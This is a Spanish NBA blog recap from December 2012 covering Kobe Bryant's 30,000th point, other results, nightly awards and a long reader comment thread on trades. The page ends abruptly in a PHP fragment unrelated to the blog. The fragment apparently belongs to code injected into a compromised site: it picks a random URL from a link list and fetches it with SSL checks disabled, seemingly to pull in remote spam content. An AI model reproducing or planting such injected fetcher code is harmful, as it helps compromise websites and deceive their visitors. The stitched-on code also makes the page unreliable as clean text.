La Crónica: Kobe se une al club de los 30.000

06 de December de 2012 por Simon

kobe30000Menú típico de miércoles en la NBA, con muchos partidos pero sin ningún planto principal en la mesa, ideal para reservar jugadores sin ser sancionado aunque eso esta noche no sucedió. Kobe Bryant se convirtió en el quinto jugador de la historia en superar la barrera de los 30.000 puntos (el más joven en hacerlo), curiosamente ante el equipo que lo eligió en el draft y lo mandó directamente en un traspaso rumbo a Los Angeles para empezar a forjar esa leyenda en la que se ha convertido.

Los Angeles Lakers consiguieron la victoria en New Orleans en un partido que siguió el guión previsto, el que casi siempre siguen los partidos entre los equipos (supuestamente) punteros y los de la parte baja, el pequeño domina durante la primera parte mientras el grande va poco a poco acelerando para dejar atrás al equipo pequeño durante la segunda parte. Esta vez Los Angeles Lakers consiguieron vencer con relativa comodidad a los Hornets gracias a un buen acierto desde la larga distancia. Buen partido general de todas las piezas importantes de los Lakers, que consiguieron una cómoda ventaja que evitó tener que pasar por un final igualado y por consiguiente por el Hack-a-Howard. Por parte de Hornets el mejor fue Ryan Anderson, como de costumbre (103-87).

El vecino pobre de los Lakers logró su cuarta victoria seguida ante Dallas Mavericks. El partido fue dominado de principio a fin por unos Clippers que vuelven a estar enchufados y practicando un gran baloncesto coral en el que Paul no está necesitando desplegar todas sus habilidades y destrezas para hacerlo funcionar. El banco rindió de maravilla como cada noche para los Clippers y a las habituales aportaciones de Bledsoe, Barnes y Crawford en los últimos dos o tres partidos se ha unido la aportación de Odom, que si bien sigue estando muy desacertado al menos últimamente si se le ha visto más enchufado e intenso que la temporada pasada o en el primer mes de competición. Si Odom rinde nadie sabe dónde está el techo de este equipo que nos deja una vez tras otra un buen elenco de Highlights.  En Dallas destacan Fisher, que no ha perdido nada de su buena mano y Carter con 15 y 16 puntos respectivamente. (90-112).

Los Celtics, en el regreso de Rondo tras su sanción, volvió a la senda de la victoria contra unos Timberwolves que no terminan de arrancar con Love. Todos los titulares de Boston acabaron en dobles figuras, con destacados partidos de Rondo (17-11), que comienza una nueva racha de +10 asistencias, y Garnett con 18 puntos y 10 rebotes. El partido fue más o menos igualado durante el primer tiempo y el tercer cuarto pero los Celtics comenzaron el último cuarto encendidos en el que consiguieron abrir la ventaja a 15 puntos a falta de 7 minutos, y a partir de ese momento se dedicaron a administrar su ventaja y no permitir que Minnesota tuviera opción de acercarse. En Minnesota pesó como una losa el raquítico 14/30 en tiros libres que se marcaron, con el propio Love en plan Howard fallando la mitad de sus lanzamientos desde la línea de tiros libres (94-104).

En el AT&T Center de San Antonio, los Spurs dieron libertad a los Bucks para hacer y deshacer durante los 3 primeros cuartos del partido, para a partir del último cuarto y con la mayoría de suplentes en cancha abrir una brecha de 8 o 10 puntos que se mantendría hasta el final del partido. Por mucho que se diga no deja de alucinarnos la manera en la que TODO el mundo aporta en San Antonio. Ayer, 40 puntos para el banquillo de Popovich y además fueron ellos los que rompieron el encuentro a favor de los Spurs. Los Bucks siguen atravesando una crisis que ya les lleva a estar en negativo. Esta vez Ellis fue el mejor en un partido flojito de Jennings. Lo único positivo para los Bucks es que Ilyasova  (parece) quiere empezar a aportar. La verdad, no se entiende que Dalembert salga desde el banquillo. Skiles debe plantearse la rotación de interiores, que cambia cada noche. Sanders esta vez fue el titular junto a Udoh y ambos estuvieron realmente flojos. Si sigue así Ilyasova no tardará en volver al quinteto (99-110).

jrwinnerLos Knicks ganaron en un entretenido y apretado encuentro a unos Bobcats que siguen siendo capaces de competir en todos los partidos. Ayer llegaron con ventaja al último minuto pero un par de pérdidas tontas fruto de la precipitación y la inexperiencia le dio la opción a NYK de empatar y ganar el partido con una meritoria canasta de JR Smith sobre la bocina. Carmelo tuvo que abandonar el partido con un corte en el dedo, suponemos que estará disponible para jugar hoy ante los Miami Heat, si no Stern puede cabrearse de nuevo.  Sigue el gran momento de forma de Tyson Chandler, que logró un doble doble con 18 puntos y 17 rebotes (100-98).

Chicago logró una buena victoria en Cleveland cimentada en un gran primer cuarto del partido para ellos que acabó con un 27-11 a favor de los Bulls, que  a partir de ahí tuvieron un partido más o menos plácido. Solo en un par de ocasiones los Cavs se acercaron a 7 u 8 puntos pero nunca peligró la victoria de Chicago. El mejor para los Bulls fue Bellinelli que salió en el quinteto en lugar del lesionado RIP Hamilton. Varejao logró su décimo partido consecutivo con doble doble de más de 15 rebotes y 5 ofensivos y se acerca a Moses Malone, quien logró 12 seguidos (95-85).

En el resto de partidos de la jornada, Indiana venció a Portland (92-99) gracias a un gran tercer cuarto (14-31), gran partido de Paul George con 22-8-5 y secando a su par, Batum, que tuvo un partido para olvidar. Los Warriors siguen acumulando victorias, esta vez ante Detroit (104-97). El partido se rompió en el tercer cuarto con un +16 para GSW. Grandes partidos de Thompson y Curry unidos al habitual de Lee. En Detroit Monroe estuvo muy flojo y Drummond aprovechó sus minutos para lograr un doble doble con 15 puntos y 12 rebotes.

Denver sigue dejando una mala impresión y perdió en Atlanta (104-108). El mejor para los Hawks fue Horford con 25 puntos y 12 rebotes que estuvo bien acompañado por Smith 16-13 y Lou Williams con otros 16 puntos. En Denver el mejor fue Lawson con 32 puntos pero a falta de 30 segundos y 2 abajo se botó el balón en el pie y Smith recogió ese balón para machacarlo a placer en el otro lado de la cancha.

Utah volvió al 50% al vencer en casa a Orlando (81-87) con un gran partido de Al Jefferson (31-15).  Cousins y Evans se combinaron para 48 puntos en la victoria de Sacramento ante Toronto (100-107). Partidazo de Lowry que no fue suficiente para vencer.

PREMIOS

MVP: Excelente actuación de Al Jefferson, quien en un partido de bajísima anotación se fue a los 31 puntos (13 de 20 en tiros de campo) y 15 rebotes. El premio “a toda una carrera” va para Kobe Bryant, jugador más joven en alcanzar los 30.000 puntos y que se une a Jordan, Malone, Wilt y Kareem. Anoche en New Orleans, Bryant logró 29 puntos con 10 de 17 en tiros, además de 6 rebotes, 4 asistencias y 3 robos.

Rookie: Sigue cimentando su candidatra al ROY Damian Lillard, con 23 puntos y 6 asistencias sin pérdidas. Con Anthony Davis fuera de concurso, Drummond, que logró 15 puntos y 12 rebotes, fue el único que le hizo sombra.

Sorpresa: Ilyasova existe. Sospechábamos que lo del año pasado fue un holograma o algo fruto de nuestra imaginación, pero anoche fue de lo mejor de lo Bucks en San Antonio, con 17 puntos y 5 rebotes como suplente. ¿Sorprenden los 15 puntos de Derek Fisher?

Decepción: Desaparecido durante casi todo el partido, Nico Batum se limitó a 5 puntos y 4 asistencias en el partido entre Blazers y Pacers. Muy decepcionante también Iguodala, cuya estadística más elevada fueron las 7 pérdidas de balón que cometió, por solo 5 puntos, 4 rebotes y 4 asistencias.

Esfuerzo en vano: Ryan Anderson logró 31 puntos y 9 rebotes ante Lakers, y Lawson obtuvo un espectacular 32-7-5 en Atlanta, pero el premio es para Kyle Lowry, autor de 34 puntos y 11 asistencias en otra derrota ajustada de los Raptors.

Top 10

Imágenes | AP Photos / Getty Images

Comenta

27 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Excelente crónica Simón. Sólo un apunte. Lo de Varejao ya van 10 consecutivos, no 9. Está a 2 de igualar a Moses

      Citar

  2. melo15 dice:
    #2

    Siguen sumando los Knicks, esta vez ante los Bobcats que al final no creo que se clasifiquen a PO, aunque tampoco les conviene del todo.
    Canaston de J.R porque la defensa de Kidd-Gilchrist es soberbia, no le deja ni un centimetro.
    Brutal Andre Drummond, muichas dudas despertaba pero el chaval se esta saliendo y en un par o tres años creo que lo veremos en lo mas alto.

      Citar

  3. Viva_Dirk dice:
    #3

    Vaya jugón Ryan Anderson!!! Me parece uno de los grandes infravalorados de la liga, es una pasada de jugador. Y no se que coño pasa con Eric Gordon, pero si no quiere jugar en un equipo como este no se en cual va a querer jugar, podrian hacer grandes cosas con el a tope.

      Citar

  4. melo15 dice:
    #4

    Viva, pasa que Gordon esta lesionado, no es que no quiere.

      Citar

  5. Sancho88 dice:
    #5

    Coincido contigo Viva. Lo de Anderson es escandaloso. Para mí, es mejor tirador que Love. No tan completo, pero tiene la técnica más depurada, los movimientos más precisos, ágiles y estilísticos, y tiene una cabecita muy bien puesta. Claro, que no deja de ser un cuatro abierto y pegándose en la zona contra osotes no tiene nada que hacer. No obstante, es sorprendente cómo aprovecha todas sus cualidades y las pone al servicio de un equipo tan deprimente como los Hornets. Lo de Eric Gordon es lamentable… La puta regla de amnistía habría que cambiarla, y a gente como Gordon, Arenas y toda esta gentuza, directamente, suspenderles los contratos y a tomar x culo, que no cobren ni un dolar

      Citar

  6. simon dice:
    #6

    Sancho88:
    Excelente crónica Simón. Sólo un apunte. Lo de Varejao ya van 10 consecutivos, no 9. Está a 2 de igualar a Moses

    Vaya se me escapó un partido, ahora lo cambiará Magic o Txus cuando lo vea. Es que es una barbaridad, lleva un promedio de 15,4 rebotes por partido.
    Con el tema Anderson no pensaba que fuera a ser capaz de jugar a este nivel. En las hoops recibi una oferta recien acabado el draft Anderson mas Bass por Millsap creo que fue y la rechace,,, si lo llego a saber que iba a rendir asi…
    Lo que dice Melo es verdad, la defensa fue perfecta pero la ejecucion de Smith fue aun mejor.
    El tema Gordon creo que ya hay algo tmbn de lo que se comenta de que no quiere jugar en Phoenix, lo cual me parece increible, no se que ha hecho ese chico en su carrera para no querer jugar en Phoenix…

      Citar

  7. Jose Luis dice:
    #7

    En Phoenix si quería, de hecho le hicieron oferta por el máximo y Gordon pidió a los Hornets que no la igualaran.

      Citar

  8. rumbero dice:
    #8

    simon
    El tema Gordon creo que ya hay algo tmbn de lo que se comenta de que no quiere jugar en Phoenix, lo cual me parece increible, no se que ha hecho ese chico en su carrera para no querer jugar en Phoenix…

    Supongo que querias decir lo contrario, se iba a ir a Phoenix pero en New Orleans igualaron la oferta y desde ese momento se dice que son más las pocas ganas que tiene de jugar ahí que sus problemas de rodilla. Pues si es cierto y teniendo en cuenta que está cobrando 58 millones en 4 temporadas con 23 años habiendo estado más lesionado que sano, bendita mierda de profesional. Además como dice Viva estos Hornets con un Gordon comprometido molarían bastante. Vasquez-Gordon-Anderson-Davis parece una buena base.

      Citar

  9. Esteban dice:
    #9

    Gordon si vuelve como el año pasado paga solo su contrato, como bogut es una apuesta, si sale bien das un salto de calidad, si sale mal, es dinero a la basura,

    El riesgo en ambos casos era demasiado alto, pero no volvio grant hill en buen nivel en su momento? Es decir, los milagros suceden

      Citar

  10. Pikerton64 dice:
    #10

    Los que queráis el MVP para Love os recomiendo ver el MIN – BOS de ayer. “¡19-13, vaya, qué dios!” Cabría pensar. Que ascazo, que rabia de verdad, que falta de deportividad y de liderazgo. Daba vergüenza ver lo que hizo. Y no hablo de tiros libres, fallar es humano y más si tu lesión de un mes ha sido de muñeca, sino de como perdía la bola y bajaba andando, de como no defiende, se nota que teme que le piten faltas no vaya a ser que no haga su doble-doble. Mostró una apatía vergonzosa. El que falta es Ricky, y más viendo como Adelman no sabe que hacer con Love, porque antes de su vuelta estábamos jugando como ángeles. Y AK, pero como jugaba al principio.
    He leído que los Wolves deberían ir 0-17, pero no será por equipo o calendario, habiéndose enfrentado a Toronto, Charlotte o Sacramento (dos veces). Yo creo que el balance es el esperado: cerca del 0.500, con jugadores como Pek, Ridnour (tiro nashesco), Barea, Shved o Dante Cunnigham (antes Bud y AK47 y ahora Love). Cuando vuelvan los lesionados y Love recupere la forma, porque está claro que Love es el jugador más importante de Minny, con un rebote fuera de números y un tiro exquisito (el año pasado), va a formarse un Ricky – Rid – AK – Luv – Pek (gran pareja interior, Ridnour y su FG% y Ricky-AK), y un suplentes Barrrea – Shved – Josh Howard – Dante Cunnigham – Steamer (Barea, Shved y Howard de 6°s hombres, rebotes Dante y Steamer taponando). Se caerían Lee y DWill, a quien hay que tradear antes de que nadie lo quiera o entrenar para que explote definitivamente. Lástima mi Roy :'( y Budinger, claro, que empezó genial, como líder del equipo en los partidos inmediatamente anteriores a su lesión.
    Conclusión: Los Wolves parecen desorientados, a falta de un líder (Love se borra, se olvidan a veces de Pek) y desganados. Ricky puede traer calma en cuanto a que es una bestia organizando el juego y que ya los Wolves no tendrán excusas ni podrán darle largas a ganar. Podrán trabajar todos juntos conscientes ya de que ese es el equipo definitivo. Y con los quintetos que he dicho y todos jugando a su nivel son un gran equipo a nivel de 5°s o 6° del Oeste. Sí.

      Citar

  11. Viva_Dirk dice:
    #11

    Sancho88:
    Coincido contigo Viva. Lo de Anderson es escandaloso. Para mí, es mejor tirador que Love. No tan completo, pero tiene la técnica más depurada, los movimientos más precisos, ágiles y estilísticos, y tiene una cabecita muy bien puesta. Claro, que no deja de ser un cuatro abierto y pegándose en la zona contra osotes no tiene nada que hacer.

    Esa es la cuestión, que no tiene nada que hacer contra grandes físicos pero se las apaña para coger 8 rebotes por noche, 2 de ellos ofensivos y eso que vive a mas de 6 metros del aro en ataque. Y su porcentaje en tiro de 2 es de un 54%.

    Lo dicho, no es resultón, pero es un jugadorazo. Vamos tanto que hablamos de posibilidades de traspaso para Pau, este tio seria la bomba para los actuales Lakers.

      Citar

  12. simon dice:
    #12

    Jose Luis:
    En Phoenix si quería, de hecho le hicieron oferta por el máximo y Gordon pidió a los Hornets que no la igualaran.

    rumbero: Supongo que querias decir lo contrario, se iba a ir a Phoenix pero en New Orleans igualaron la oferta y desde ese momento se dice que son más las pocas ganas que tiene de jugar ahí que sus problemas de rodilla. Pues si es cierto y teniendo en cuenta que está cobrando 58 millones en 4 temporadas con 23 años habiendo estado más lesionado que sano, bendita mierda de profesional. Además como dice Viva estos Hornets con un Gordon comprometido molarían bastante. Vasquez-Gordon-Anderson-Davis parece una buena base.

    Me confundí, queria decir NOLA. Pero vamos que el lugar me da igual… un tio que con 23 años y que no ha hecho absolutamente NADA al maximo nivel ( desconozco su carrera pre NBA ) con ese contratazo si es verdad que no quiere jugar en el lugar que le ha tocado pues mas vale que hubiera rechazo todas las ofertas ( de NOLA , Phoenix o donde fuera ) y se hubiera pasado un año en blanco o en europa y al año siguiente hubiera vuelto como agente libre sin restricciones y el podria haber elegido el destino que quisiera, pero es muy facil poner la mano y luego llorar pq no quiero jugar alli…. una verguenza si son ciertos los rumores.

      Citar

  13. Sancho88 dice:
    #13

    Fíjate, al final no hay que darle muchas vueltas al asunto. Fichas a Nash y Howard, y pones de entrenador a D’Antoni, con el que mejor se ha entendido Nash, y de 4 abierto a Anderson, el que mejor ha entendido el juego de Howard, que es un Ronaldo Nazario de la vida, necesita todo el terreno para él solo para rendir. La lógica es aplastante. Anderson-Jamison acompañando a Howard, con Hill cogiendo minutos y responsabilidad como suplente (lo está haciendo de lujo sin Pau), más un Turkoglu + una primera ronda, o algo así para cuadrar el traspaso, estaría de lujo para Lakers, porque les resuelve de un plumazo los problemas del actual sistema, y es que no tienen suficientes tiradores para que Nash haga lo que hacía en Phoenix, pero con Anderson y Turkoglu, más Bryant, más Jamison mas Artest que está tirando de lujo, más Meeks… y tienes artillería fina para machacar desde fuera a los rivales

      Citar

  14. Denise dice:
    #14

    Sancho88:
    Fíjate, al final no hay que darle muchas vueltas al asunto. Fichas a Nash y Howard, y pones de entrenador a D’Antoni, con el que mejor se ha entendido Nash, y de 4 abierto a Anderson, el que mejor ha entendido el juego de Howard, que es un Ronaldo Nazario de la vida, necesita todo el terreno para él solo para rendir. La lógica es aplastante. Anderson-Jamison acompañando a Howard, con Hill cogiendo minutos y responsabilidad como suplente (lo está haciendo de lujo sin Pau), más un Turkoglu + una primera ronda, o algo así para cuadrar el traspaso, estaría de lujo para Lakers, porque les resuelve de un plumazo los problemas del actual sistema, y es que no tienen suficientes tiradores para que Nash haga lo que hacía en Phoenix, pero con Anderson y Turkoglu, más Bryant, más Jamison mas Artest que está tirando de lujo, más Meeks… y tienes artillería fina para machacar desde fuera a los rivales

    Te refieres a Turkoglu y Anderson a Lakers por Pau?? Sería un traspaso a 3 bandas entre Lakers, Orlando y Hornets que tendría que involucrar a muchos jugadores (y con salarios altos) más para cuadrar el salario. Muy dificil de que se pudiera completar

      Citar

  15. Denise dice:
    #15

    Directamente sería mas sencillo un Pau por Turkoglu y Harrington, dos 3-4 bastante abiertos que vendrían bien en el esquema de Lakers.

      Citar

  16. MagicJohnson32 dice:
    #16

    Viva_Dirk: Esa es la cuestión, que no tiene nada que hacer contra grandes físicos pero se las apaña para coger 8 rebotes por noche, 2 de ellos ofensivos y eso que vive a mas de 6 metros del aro en ataque. Y su porcentaje en tiro de 2 es de un 54%.

    Lo dicho, no es resultón, pero es un jugadorazo. Vamos tanto que hablamos de posibilidades de traspaso para Pau, este tio seria la bomba para los actuales Lakers.

    De hecho, se rumorea que sería el objetivo número 1 de Lakers en caso de traspaso de Pau.

      Citar

  17. MagicJohnson32 dice:
    #17

    Por cierto, hoy se dice que los Lakers han rechazado ofertas por Gasol de los Wolves (con Derrick Williams y Pekovic) y de los Raptors (Bargnani, Calde, Kleiza), y que no se plantearán nada hasta después de la vuelta de Nash.

      Citar

  18. melo15 dice:
    #18

    Esto que decis de Gordon os lo estais inventando, primero Gordon con los Clippers te hacia 20pp por partido y ademas es bastante completo en lo demas. Si no ha podido progresar mas (all-star?) ha sido por las continuas lesionas. Ademas esto de que no juega porque no quiere me parece que es mentira.

      Citar

  19. Sancho88 dice:
    #19

    Ah hostia, estoy tonto… lo de Turkoglu lo dije todavia pensando en que Anderson estaba en los Magic… joder, que mala pasada. Pondría a Aminu entonces

      Citar

  20. Esteban dice:
    #20

    MagicJohnson32: no ha podido progresar mas (all-star?) ha sido por las continuas lesionas. Ademas esto de que no juega porque no quiere me parece que es mentira.

    VAMOS, calderon, bargani y kleiza por gasol y no lo han aceptado? no jodais

    calderon como base sustituto seria la hostia, mientras que kleiza seria un relevo o alternativa exelente a metta

    bargani da ciertas dudas, pero como CUARTA opcion ofensiva de un equipo, lo veo mas que capacitado, similar a antonio mcdyess, siempre parecio un HACE NUMERO, pero cuando llego a detroit como 5ta o 6ta arma ofensiva se lucio de maravillas

    tomemos en cuenta que calderon es un expiring de 10 millones, que el año proximo serian 30 por el impuesto de lujo, plata que se ahorran los lakers

    y ganan muchisimo en juventud con bargani y sus 10 millones y kleiza

    los lakers saldrian mjuy beneficiados, mientras que los raptors lo mismo, calderon y kleiza son suplentes y barganani no puede ser el lider del equipo que si podria ser gasol, su fichaje junto a lowry, derozan y valaciunas deberian ponerlos en seria carrera a PO

      Citar

  21. Esteban dice:
    #21

    El prestigioso periodista Chris Sheridan especula con una posibilidad de traspaso a tres bandas Chicago-Hornets-Lakers. Pau acabaría en los Bulls, equipo para el que ya sonó la temporada pasada, Anderson en los Lakers, y Gibson, una ronda de draft y los derechos de Mirotic acabarían en New Orleans.

    esto tendria mucho sentido poara los hornets y su reconstruccion

    para los bulls obviamente, gasol y perder a gibson? genial

    a los lakers sacarse los 20 millones de gasol por los 8.700 de anderson? la hostia

    un traspaso interesante si no tenemos en cuenta que los lakers estarian cediendo 20 millones y recibiendo solo 9, los bulls cediendo un total que rondaria los 6 o 7 millones y recibiendo 20, con dos ala pivote de 20 millones cada uno…

    cada cosa de escucha

      Citar

  22. HisRoyalAirness dice:
    #22

    De momento me estoy comiendo con patatas y punto por punto mi análisis de los Knicks.

    Y lo que me alegro

      Citar

  23. Vader dice:
    #23

    HisRoyalAirness:
    De momento me estoy comiendo con patatas y punto por punto mi análisis de los Knicks.

    Y lo que me alegro

    Yo tambien me alegro 🙂

    Ya era hora que los Knicks nos dieran alegrias!! La verdad es que este verano se han movido muy bien (Felton, Kidd) y el año pasado ya hicieron tambien algunos fichajes interesantes (JR Smith, Chandler, Novak…) El equipo tenia que ir para arriba. Ahora la incognita es como encajara Stat…

      Citar

  24. Esteban dice:
    #24

    Bueno His, recordaras la disputa q tuvimos sobre los Knicks no? Jeje siempre me encanto que aramron,

    Eso para sancho que me llama oportunista

      Citar

  25. Sancho88 dice:
    #25

    Jejeje, cierto, tu te subiste a aquel carro Linista ilusionista de los Knicks y yo os dije que cuidado q en NY las alegrías duraban poco. Ahora he de decir que enhorabuena a todos los seguidores de la gran manzana, menos a Trecet que me cae mal, porque lo que habéis tenido que sufrir para ver al equipo bien… solo lo sabeis vosotros. Ahora aspiran a todo. Ayer en la cancha se les veía un equipo peligroso de cojones, que sabe a qué quiere jugar, corren como veinteañeros y tienen en Raymond Felton y Jason Kidd un dúo de creadores impresionante. Mola el small ball de los Knicks. Espero que siga Melo de 4. Yo no quiero ver ahí a Stat ni en pintura. Lo jodería todo. Hay que dejarlo tal y como está, no creeis?

      Citar

  26. Esteban dice:
    #26

    Sancho88: porque lo que habéis tenido que sufrir para ver al equipo bien… solo lo sabeis vosotros. Ahora aspiran a todo. Ayer en la cancha se les veía un equipo peligroso de cojones, que sabe a qué quiere jugar, corre

    no te confundes, el analisis fue despues de que LIN fichara por los rockets, y con el plantel actual, el analisis esta disponible y mis comentarios tambien, entra

    saludos

      Citar

  27. melo15 dice:
    #27

    Nose Sancho, deciamos lo mismo con Pau, a un tio que cobra 20M no lo puedes dejar sin jugar no? Yo de entrada lo probaria porque el Stat tiene talento y es bueno. Yo le intentaria inculcar el espiritu defensivo del equipo y si ves que empezamos a perder partidos pues al banco.
    Pero se puede sacar mas jugo a Stat.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>